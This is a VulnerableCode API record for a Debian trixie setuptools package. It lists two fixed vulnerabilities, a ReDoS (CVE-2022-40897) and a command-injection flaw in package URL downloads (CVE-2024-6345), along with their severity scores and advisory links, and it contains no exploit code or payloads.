Django REST framework

Lookup for vulnerable packages by Package URL.

Purl pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie

Type deb

Namespace debian

Name setuptools

Version 66.1.1-1+deb12u2

Qualifiers

distro	trixie

Subpath

Is_vulnerable false

Next_non_vulnerable_version 70.3.0-2

Latest_non_vulnerable_version 70.3.0-2

Affected_by_vulnerabilities

Fixing_vulnerabilities

url VCID-ebnc-7f5a-effj

vulnerability_id VCID-ebnc-7f5a-effj

summary Python Packaging Authority (PyPA) setuptools before 65.5.1 allows remote attackers to cause a denial of service via HTML in a crafted package or custom PackageIndex page. There is a Regular Expression Denial of Service (ReDoS) in package_index.py.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-40897.json

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-40897.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2022-40897

reference_id

reference_type

scores

value	0.00513
scoring_system	epss
scoring_elements	0.66519
published_at	2026-04-21T12:55:00Z

value	0.00513
scoring_system	epss
scoring_elements	0.66534
published_at	2026-04-18T12:55:00Z

value	0.00513
scoring_system	epss
scoring_elements	0.66517
published_at	2026-04-16T12:55:00Z

value	0.00513
scoring_system	epss
scoring_elements	0.66481
published_at	2026-04-13T12:55:00Z

value	0.00513
scoring_system	epss
scoring_elements	0.66513
published_at	2026-04-12T12:55:00Z

value	0.00513
scoring_system	epss
scoring_elements	0.66525
published_at	2026-04-11T12:55:00Z

value	0.00513
scoring_system	epss
scoring_elements	0.66505
published_at	2026-04-09T12:55:00Z

value	0.00513
scoring_system	epss
scoring_elements	0.66491
published_at	2026-04-08T12:55:00Z

value	0.00513
scoring_system	epss
scoring_elements	0.66445
published_at	2026-04-02T12:55:00Z

value	0.00513
scoring_system	epss
scoring_elements	0.66443
published_at	2026-04-07T12:55:00Z

value	0.00513
scoring_system	epss
scoring_elements	0.66472
published_at	2026-04-04T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2022-40897

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40897
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40897

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	4.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2022-43012.yaml

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2022-43012.yaml

reference_url

https://github.com/pypa/setuptools

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/setuptools

reference_url

https://github.com/pypa/setuptools/blob/fe8a98e696241487ba6ac9f91faa38ade939ec5d/setuptools/package_index.py#L200

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/

url

https://github.com/pypa/setuptools/blob/fe8a98e696241487ba6ac9f91faa38ade939ec5d/setuptools/package_index.py#L200

reference_url

https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/

url

https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be

reference_url

https://github.com/pypa/setuptools/compare/v65.5.0...v65.5.1

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/

url

https://github.com/pypa/setuptools/compare/v65.5.0...v65.5.1

reference_url

https://github.com/pypa/setuptools/issues/3659

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/setuptools/issues/3659

reference_url

https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H

reference_url

https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R

reference_url

https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2022-40897

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2022-40897

reference_url

https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages

reference_url

https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/

url

https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/

reference_url

https://pyup.io/vulnerabilities/CVE-2022-40897/52495

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://pyup.io/vulnerabilities/CVE-2022-40897/52495

reference_url

https://pyup.io/vulnerabilities/CVE-2022-40897/52495/

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/

url

https://pyup.io/vulnerabilities/CVE-2022-40897/52495/

reference_url

https://security.netapp.com/advisory/ntap-20230214-0001

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://security.netapp.com/advisory/ntap-20230214-0001

reference_url

https://security.netapp.com/advisory/ntap-20240621-0006

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://security.netapp.com/advisory/ntap-20240621-0006

reference_url

https://setuptools.pypa.io/en/latest

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	8.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://setuptools.pypa.io/en/latest

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2158559
reference_id	2158559
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2158559

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R/

reference_id

ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R/

reference_url

https://github.com/advisories/GHSA-r9hx-vwmv-q579

reference_id

GHSA-r9hx-vwmv-q579

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-r9hx-vwmv-q579

reference_url	https://security.gentoo.org/glsa/202405-10
reference_id	GLSA-202405-10
reference_type
scores
url	https://security.gentoo.org/glsa/202405-10

reference_url

https://security.netapp.com/advisory/ntap-20230214-0001/

reference_id

ntap-20230214-0001

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/

url

https://security.netapp.com/advisory/ntap-20230214-0001/

reference_url	https://access.redhat.com/errata/RHSA-2023:0835
reference_id	RHSA-2023:0835
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2023:0835

reference_url	https://access.redhat.com/errata/RHSA-2023:0952
reference_id	RHSA-2023:0952
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2023:0952

reference_url	https://access.redhat.com/errata/RHSA-2023:6793
reference_id	RHSA-2023:6793
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2023:6793

reference_url	https://access.redhat.com/errata/RHSA-2023:7395
reference_id	RHSA-2023:7395
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2023:7395

reference_url	https://access.redhat.com/errata/RHSA-2024:2985
reference_id	RHSA-2024:2985
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:2985

reference_url	https://access.redhat.com/errata/RHSA-2024:2987
reference_id	RHSA-2024:2987
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:2987

reference_url	https://access.redhat.com/errata/RHSA-2024:4421
reference_id	RHSA-2024:4421
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:4421

reference_url	https://access.redhat.com/errata/RHSA-2024:6915
reference_id	RHSA-2024:6915
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6915

reference_url	https://usn.ubuntu.com/5817-1/
reference_id	USN-5817-1
reference_type
scores
url	https://usn.ubuntu.com/5817-1/

reference_url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H/

reference_id

YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H

reference_type

scores

value	5.9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/

url

https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H/

fixed_packages

url	pkg:deb/debian/setuptools@52.0.0-4?distro=trixie
purl	pkg:deb/debian/setuptools@52.0.0-4?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%3Fdistro=trixie

url	pkg:deb/debian/setuptools@52.0.0-4%2Bdeb11u1?distro=trixie
purl	pkg:deb/debian/setuptools@52.0.0-4%2Bdeb11u1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%252Bdeb11u1%3Fdistro=trixie

url	pkg:deb/debian/setuptools@65.6.3-1?distro=trixie
purl	pkg:deb/debian/setuptools@65.6.3-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@65.6.3-1%3Fdistro=trixie

url	pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie
purl	pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@66.1.1-1%252Bdeb12u2%3Fdistro=trixie

url pkg:deb/debian/setuptools@78.1.1-0.1?distro=trixie

purl pkg:deb/debian/setuptools@78.1.1-0.1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-v6y5-h7b6-3qda

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@78.1.1-0.1%3Fdistro=trixie

aliases BIT-setuptools-2022-40897, CVE-2022-40897, GHSA-r9hx-vwmv-q579, PYSEC-2022-43012

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ebnc-7f5a-effj

url VCID-qt3x-msd9-tyct

vulnerability_id VCID-qt3x-msd9-tyct

summary

setuptools vulnerable to Command Injection via package URL
A vulnerability in the `package_index` module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-6345.json

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-6345.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2024-6345

reference_id

reference_type

scores

value	0.05553
scoring_system	epss
scoring_elements	0.90291
published_at	2026-04-16T12:55:00Z

value	0.05553
scoring_system	epss
scoring_elements	0.90275
published_at	2026-04-13T12:55:00Z

value	0.05553
scoring_system	epss
scoring_elements	0.90281
published_at	2026-04-12T12:55:00Z

value	0.05553
scoring_system	epss
scoring_elements	0.90282
published_at	2026-04-11T12:55:00Z

value	0.05553
scoring_system	epss
scoring_elements	0.90273
published_at	2026-04-09T12:55:00Z

value	0.05553
scoring_system	epss
scoring_elements	0.90267
published_at	2026-04-08T12:55:00Z

value	0.05553
scoring_system	epss
scoring_elements	0.90251
published_at	2026-04-07T12:55:00Z

value	0.05697
scoring_system	epss
scoring_elements	0.90425
published_at	2026-04-21T12:55:00Z

value	0.05697
scoring_system	epss
scoring_elements	0.90427
published_at	2026-04-18T12:55:00Z

value	0.07336
scoring_system	epss
scoring_elements	0.9167
published_at	2026-04-04T12:55:00Z

value	0.07336
scoring_system	epss
scoring_elements	0.91665
published_at	2026-04-02T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2024-6345

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6345
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6345

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/pypa/setuptools

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	7.5
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/setuptools

reference_url

https://github.com/pypa/setuptools/commit/88807c7062788254f654ea8c03427adc859321f0

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	7.5
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-15T13:33:16Z/

url

https://github.com/pypa/setuptools/commit/88807c7062788254f654ea8c03427adc859321f0

reference_url

https://github.com/pypa/setuptools/pull/4332

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	7.5
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/pypa/setuptools/pull/4332

reference_url

https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	7.5
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-15T13:33:16Z/

url

https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5

reference_url

https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	7.5
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2024-6345

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

value	7.5
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2024-6345

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2297771
reference_id	2297771
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2297771

reference_url

https://github.com/advisories/GHSA-cx63-2mw6-8hw5

reference_id

GHSA-cx63-2mw6-8hw5

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-cx63-2mw6-8hw5

reference_url	https://access.redhat.com/errata/RHSA-2024:10135
reference_id	RHSA-2024:10135
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:10135

reference_url	https://access.redhat.com/errata/RHSA-2024:11109
reference_id	RHSA-2024:11109
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:11109

reference_url	https://access.redhat.com/errata/RHSA-2024:5000
reference_id	RHSA-2024:5000
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5000

reference_url	https://access.redhat.com/errata/RHSA-2024:5002
reference_id	RHSA-2024:5002
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5002

reference_url	https://access.redhat.com/errata/RHSA-2024:5040
reference_id	RHSA-2024:5040
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5040

reference_url	https://access.redhat.com/errata/RHSA-2024:5078
reference_id	RHSA-2024:5078
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5078

reference_url	https://access.redhat.com/errata/RHSA-2024:5084
reference_id	RHSA-2024:5084
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5084

reference_url	https://access.redhat.com/errata/RHSA-2024:5137
reference_id	RHSA-2024:5137
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5137

reference_url	https://access.redhat.com/errata/RHSA-2024:5279
reference_id	RHSA-2024:5279
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5279

reference_url	https://access.redhat.com/errata/RHSA-2024:5389
reference_id	RHSA-2024:5389
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5389

reference_url	https://access.redhat.com/errata/RHSA-2024:5530
reference_id	RHSA-2024:5530
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5530

reference_url	https://access.redhat.com/errata/RHSA-2024:5531
reference_id	RHSA-2024:5531
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5531

reference_url	https://access.redhat.com/errata/RHSA-2024:5532
reference_id	RHSA-2024:5532
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5532

reference_url	https://access.redhat.com/errata/RHSA-2024:5533
reference_id	RHSA-2024:5533
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5533

reference_url	https://access.redhat.com/errata/RHSA-2024:5534
reference_id	RHSA-2024:5534
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5534

reference_url	https://access.redhat.com/errata/RHSA-2024:5962
reference_id	RHSA-2024:5962
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:5962

reference_url	https://access.redhat.com/errata/RHSA-2024:6220
reference_id	RHSA-2024:6220
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6220

reference_url	https://access.redhat.com/errata/RHSA-2024:6309
reference_id	RHSA-2024:6309
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6309

reference_url	https://access.redhat.com/errata/RHSA-2024:6311
reference_id	RHSA-2024:6311
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6311

reference_url	https://access.redhat.com/errata/RHSA-2024:6312
reference_id	RHSA-2024:6312
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2024:6312

reference_url	https://access.redhat.com/errata/RHSA-2024:6488
reference_id	RHSA-2024:6488
reference_type
scores
